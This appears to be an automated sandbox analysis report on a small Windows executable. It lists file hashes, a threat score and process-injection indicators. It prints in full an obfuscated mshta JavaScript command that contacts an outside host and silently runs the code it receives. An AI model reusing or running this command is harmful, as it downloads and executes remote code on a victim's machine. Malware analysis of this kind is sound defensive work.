4b40eb7af466f9aada78a955661f611e45e288a89b6ebbbbd899ec0b5a41c3ae

Analysis

Target

usfive_20210902-062006.exe
Size

2KB
MD5

3bf58fb4fd28cc6d24da20bbf69f337a
SHA1

33b1f71be7a12af9d58fc288b5b8681da077629d
SHA256

4b40eb7af466f9aada78a955661f611e45e288a89b6ebbbbd899ec0b5a41c3ae
SHA512

dce815a730cf343ddcf6680ed8ab2b40d9cd9daa8bef72f8290e144fff86493fa34297946f53b814849afade4275d25c5adb43df12a014a8ffae3b86bfe052cf

Score

1^/10

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

usfive_20210902-062006.exe

description	pid	process	target process
PID 2040 wrote to memory of 1944	2040	usfive_20210902-062006.exe	mshta.exe
PID 2040 wrote to memory of 1944	2040	usfive_20210902-062006.exe	mshta.exe
PID 2040 wrote to memory of 1944	2040	usfive_20210902-062006.exe	mshta.exe
PID 2040 wrote to memory of 1944	2040	usfive_20210902-062006.exe	mshta.exe

C:\Users\Admin\AppData\Local\Temp\usfive_20210902-062006.exe
"C:\Users\Admin\AppData\Local\Temp\usfive_20210902-062006.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\SysWOW64\mshta.exe
mshta "javascript:document.write();0;y=unescape('%320%33%7E%68t%74p%3A%2F%2Fa%73u%310%2Ef%75n%2Fh%72i%2F%3F%321%616%654%62%7E%330').split('~');240;try{x='WinHttp';235;x=new ActiveXObject(x+'.'+x+'Request.5.1');239;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);72;x.send();82;y='ipt.S';78;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);196;}catch(e){};2;;window.close();"
2⤵
PID:1944

memory/1944-53-0x0000000000000000-mapping.dmp

Download
memory/1944-54-0x00000000764D1000-0x00000000764D3000-memory.dmp

Filesize
8KB

Download